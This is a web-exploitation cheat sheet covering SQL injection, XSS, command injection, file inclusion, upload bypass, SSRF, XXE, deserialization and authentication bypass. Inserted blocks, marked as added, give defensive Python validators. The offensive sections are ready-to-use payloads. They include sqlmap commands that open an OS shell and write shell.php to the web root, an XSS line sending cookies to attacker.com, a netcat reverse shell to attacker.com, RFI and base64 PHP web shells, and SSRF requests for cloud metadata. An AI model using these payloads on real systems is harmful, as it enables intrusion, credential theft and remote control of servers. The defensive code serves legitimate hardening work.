Web Exploits

SQL Injection

Manual Testing

# Basic tests
' OR '1'='1
' OR '1'='1' --
' OR '1'='1' /*
admin' --
admin' #

SQLMap

# Basic scan
sqlmap -u "http://target.com/page?id=1"

# With POST data
sqlmap -u "http://target.com/login" --data="username=admin&password=pass"

# Specify parameter
sqlmap -u "http://target.com/page?id=1" -p id

# Database enumeration
sqlmap -u "http://target.com/page?id=1" --dbs

# Dump database
sqlmap -u "http://target.com/page?id=1" -D database_name --dump

# Dump specific table
sqlmap -u "http://target.com/page?id=1" -D database_name -T table_name --dump

# Get shell
sqlmap -u "http://target.com/page?id=1" --os-shell

# Read file
sqlmap -u "http://target.com/page?id=1" --file-read="/etc/passwd"

# Write file
sqlmap -u "http://target.com/page?id=1" --file-write="shell.php" --file-dest="/var/www/html/shell.php"

Also:

  • Review the captured request in Burp's HTTP history
  • Export the request to a file (e.g. request.req)
  • sqlmap -r request.req

Cross-Site Scripting (XSS)

Basic Payloads

<!-- Basic alert -->
<script>alert('XSS')</script>

<!-- Image tag -->
<img src=x onerror=alert('XSS')>

<!-- SVG -->
<svg onload=alert('XSS')>

<!-- Body tag -->
<body onload=alert('XSS')>

<!-- Cookie stealing -->
<script>document.location='http://attacker.com/steal.php?c='+document.cookie</script>

XSS Tools

# XSStrike
xsstrike -u "http://target.com/page?param=value"

# Dalfox
dalfox url "http://target.com/page?param=value"

Command Injection

Basic Payloads

# Command chaining
; ls
& ls
&& ls
| ls
|| ls

# Command substitution
`ls`
$(ls)

# Common injections
127.0.0.1; cat /etc/passwd
127.0.0.1 && whoami
127.0.0.1 | nc attacker.com 4444 -e /bin/bash
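The defensive counterpart to the chaining payloads above, as an added example (not from the original page): a host parameter is validated against a strict grammar and then passed to the command as one argv element, so no shell ever sees `;`, `&&`, `|`, backticks or `$(...)`. The `ping` wrapper and the hostname regex are assumptions for the demo.

```python
import ipaddress
import re
import subprocess

# RFC 1123-style hostname: labels of letters, digits and hyphens, dot-separated.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def is_safe_host(value):
    """True only for a literal IP address or a syntactically valid hostname."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    return HOSTNAME_RE.match(value) is not None


def build_ping_argv(host):
    """Build the argv list for ping; raises ValueError on anything but a clean host."""
    if not is_safe_host(host):
        raise ValueError("invalid host: %r" % host)
    # One list element per argument: metacharacters in `host` are just bytes
    # of that argument, because no shell parses this command line.
    return ["ping", "-c", "1", host]


def ping(host):
    """Run ping without a shell (shell=False is the default for subprocess.run)."""
    return subprocess.run(build_ping_argv(host), capture_output=True,
                          text=True, timeout=10)


if __name__ == "__main__":
    print(build_ping_argv("127.0.0.1"))
    for bad in ("127.0.0.1; cat /etc/passwd", "127.0.0.1 && whoami", "`ls`", "$(ls)"):
        print(bad, "->", "rejected" if not is_safe_host(bad) else "ACCEPTED")
```

The allow-list check is the primary control; the argv list is the second. Either alone is weaker: `shell=True` with a validated host still risks a future validator bug, and an argv list without validation still lets an attacker inject option-like arguments if the grammar ever admits a leading `-`.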

File Inclusion

Local File Inclusion (LFI)

# Basic LFI
http://target.com/page.php?file=../../../../etc/passwd

# With null byte (PHP < 5.3)
http://target.com/page.php?file=../../../../etc/passwd%00

# PHP wrappers
http://target.com/page.php?file=php://filter/convert.base64-encode/resource=index.php
http://target.com/page.php?file=php://input

# Log poisoning
http://target.com/page.php?file=../../../../var/log/apache2/access.log

Remote File Inclusion (RFI)

# Basic RFI
http://target.com/page.php?file=http://attacker.com/shell.txt

# Data URI
http://target.com/page.php?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+
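How a `?file=` handler can be made safe against the LFI and RFI inputs listed above, as an added example (not from the original page and not PHP): decode the value, refuse null bytes and anything that looks like a stream wrapper or URL, resolve the path and require that it stays inside the pages directory. The temporary pages directory and its `about.php` are constructed for the demo.

```python
import os
import tempfile
from urllib.parse import unquote


def resolve_page(base_dir, user_value):
    """Map an untrusted ?file= value to a file under base_dir, or return None.

    Returns the real filesystem path when the request is acceptable.
    """
    value = unquote(user_value)          # see what the server would see (%00, %2e%2e)
    if "\x00" in value:                   # null-byte truncation trick
        return None
    if "://" in value:                    # php://, data://, http://, file:// wrappers
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, value))
    # realpath collapses ../ and symlinks; the result must remain inside base.
    # An absolute value such as /etc/passwd also lands outside base and is rejected.
    if os.path.commonpath([base, candidate]) != base:
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate


def make_demo_root():
    """Constructed pages directory containing a single legitimate include."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "about.php"), "w") as fh:
        fh.write("<h1>About</h1>")
    return root


if __name__ == "__main__":
    root = make_demo_root()
    for value in ("about.php",
                  "../../../../etc/passwd",
                  "../../../../etc/passwd%00",
                  "php://filter/convert.base64-encode/resource=index.php",
                  "http://attacker.com/shell.txt"):
        print(value, "->", resolve_page(root, value))
```

Where the set of includable pages is small, an explicit allow-list mapping (name to path) is simpler still and removes the filesystem from the decision entirely; the containment check above is the general form for when that is not practical.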

File Upload Exploits

Bypassing Restrictions

# Extension bypasses
shell.php
shell.php.jpg
shell.php%00.jpg
shell.php;.jpg
shell.php%0a.jpg

# Content-Type manipulation
Content-Type: image/jpeg

# Magic bytes
GIF89a; <?php system($_GET['cmd']); ?>

Server-Side Request Forgery (SSRF)

# Internal network scan
http://target.com/fetch?url=http://192.168.1.1

# Cloud metadata
http://target.com/fetch?url=http://169.254.169.254/latest/meta-data/

# File reading
http://target.com/fetch?url=file:///etc/passwd
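A server-side check for a `fetch?url=` feature that blocks the three SSRF targets above, as an added example (not from the original page): only http/https are accepted, the host is resolved, and every resulting address must be public (no private, loopback, link-local or reserved ranges, which covers 169.254.169.254). The `resolver` parameter is an assumption so the demo can be tested without DNS; the fake resolver's hostnames and addresses are constructed.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def default_resolver(hostname):
    """Real DNS lookup returning every address (A and AAAA) for the name."""
    return [info[4][0] for info in socket.getaddrinfo(hostname, None)]


def is_public_ip(ip_text):
    """True only for globally routable unicast addresses."""
    ip = ipaddress.ip_address(ip_text)
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def check_fetch_url(url, resolver=default_resolver):
    """Return (allowed, reason) for an untrusted URL the server is asked to fetch."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, "scheme not allowed: %r" % parts.scheme
    host = parts.hostname
    if not host:
        return False, "no host"
    try:
        addresses = [str(ipaddress.ip_address(host))]   # literal IPv4/IPv6
    except ValueError:
        try:
            addresses = resolver(host)
        except OSError:
            return False, "unresolvable host"
    if not addresses:
        return False, "unresolvable host"
    for addr in addresses:
        if not is_public_ip(addr):
            return False, "non-public address: %s" % addr
    return True, "ok"


if __name__ == "__main__":
    # Constructed resolver: stands in for DNS so the demo runs offline.
    fake_dns = {"intranet.example": ["10.0.0.5"], "public.example": ["8.8.8.8"]}
    for u in ("http://192.168.1.1",
              "http://169.254.169.254/latest/meta-data/",
              "file:///etc/passwd",
              "http://intranet.example/",
              "https://public.example/report"):
        print(u, "->", check_fetch_url(u, lambda h: fake_dns.get(h, [])))
```

Two caveats a practitioner would want: the fetch must connect to the address that was checked (otherwise a name that resolves differently on the second lookup, DNS rebinding, bypasses the check), and HTTP redirects must be re-validated hop by hop, since a public host can redirect to the metadata address.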

XML External Entity (XXE)

<!-- Basic XXE -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>

<!-- Blind XXE -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://attacker.com/xxe">
]>
<root>&xxe;</root>
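A defence-in-depth check for untrusted XML that refuses both documents above before any parser sees them, as an added example (not from the original page): any DOCTYPE or ENTITY declaration is rejected, then the remaining document is parsed with the standard library. `SAMPLE_XXE` is the basic payload from above, embedded here for the demo.

```python
import re
import xml.etree.ElementTree as ET

# Either declaration is needed to define an external entity; neither is
# expected in ordinary data documents, so both are refused outright.
DTD_MARKER = re.compile(r"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)

# The basic XXE payload from the cheat sheet, kept here as test input.
SAMPLE_XXE = (
    '<?xml version="1.0"?>\n'
    "<!DOCTYPE foo [\n"
    '  <!ENTITY xxe SYSTEM "file:///etc/passwd">\n'
    "]>\n"
    "<root>&xxe;</root>"
)


class UnsafeXML(ValueError):
    pass


def _to_text(data):
    """Decode bytes for inspection; a UTF-16 BOM would otherwise hide '<!DOCTYPE'."""
    if isinstance(data, str):
        return data
    if data.startswith((b"\xff\xfe", b"\xfe\xff")):
        return data.decode("utf-16")
    return data.decode("utf-8", errors="replace")


def is_unsafe_xml(data):
    """True if the document carries a DTD or entity declaration."""
    return DTD_MARKER.search(_to_text(data)) is not None


def parse_untrusted_xml(data):
    """Parse only DTD-free XML; raises UnsafeXML otherwise."""
    if is_unsafe_xml(data):
        raise UnsafeXML("DOCTYPE/ENTITY declarations are not accepted")
    return ET.fromstring(data)


if __name__ == "__main__":
    print(is_unsafe_xml(SAMPLE_XXE))                    # True
    print(parse_untrusted_xml("<root>hello</root>").text)  # hello
```

This pre-check is a screen, not the primary fix: the parser in use must itself have DTD processing and external entity resolution disabled, because encodings and parser quirks the regex does not anticipate are exactly where a screen fails.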

Deserialization Attacks

# ysoserial (Java)
java -jar ysoserial.jar CommonsCollections1 'command' | base64

# PHP deserialization (s:N: must be the exact byte length of the string)
O:8:"MyClass":1:{s:3:"cmd";s:15:"cat /etc/passwd";}

Authentication Bypass

# SQL injection
admin' --
admin' #
' OR '1'='1' --

# NoSQL injection
{"username": {"$ne": null}, "password": {"$ne": null}}

# JWT manipulation
# Decode, modify, re-encode JWT tokens
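What a verifier must do so that "decode, modify, re-encode" fails, as an added example (not from the original page): the algorithm is pinned server-side rather than read from the token, the signature is compared in constant time, and only then is the payload trusted. The signer is included only to produce a valid token for the demo; the key and claims are constructed.

```python
import base64
import hashlib
import hmac
import json


def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(payload, key):
    """Issue an HS256 JWT (demo issuer; constructed key and claims)."""
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"},
                                      separators=(",", ":")).encode())
    body = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(key, (header + "." + body).encode("ascii"), hashlib.sha256).digest()
    return header + "." + body + "." + b64url_encode(sig)


def verify_hs256(token, key):
    """Return the payload dict if token is a valid HS256 JWT under key, else None."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, body_b64, sig_b64 = parts
    try:
        header = json.loads(b64url_decode(header_b64))
        sig = b64url_decode(sig_b64)
    except (ValueError, UnicodeDecodeError):
        return None
    # Pin the algorithm: the token's own alg field never selects the check,
    # so "alg": "none" and algorithm-swap tokens are rejected here.
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None
    expected = hmac.new(key, (header_b64 + "." + body_b64).encode("ascii"),
                        hashlib.sha256).digest()
    if not hmac.compare_digest(sig, expected):   # constant-time comparison
        return None
    try:
        payload = json.loads(b64url_decode(body_b64))
    except (ValueError, UnicodeDecodeError):
        return None
    return payload if isinstance(payload, dict) else None


if __name__ == "__main__":
    key = b"constructed-demo-key"
    token = sign_hs256({"sub": "user", "admin": False}, key)
    print(verify_hs256(token, key))             # {'sub': 'user', 'admin': False}
    h, b, s = token.split(".")
    tampered = h + "." + b64url_encode(b'{"sub":"user","admin":true}') + "." + s
    print(verify_hs256(tampered, key))          # None
```

Expiry (`exp`), audience and issuer claims still need checking after the signature passes; the point of this block is only that nothing in the payload is read before the signature and algorithm have been verified.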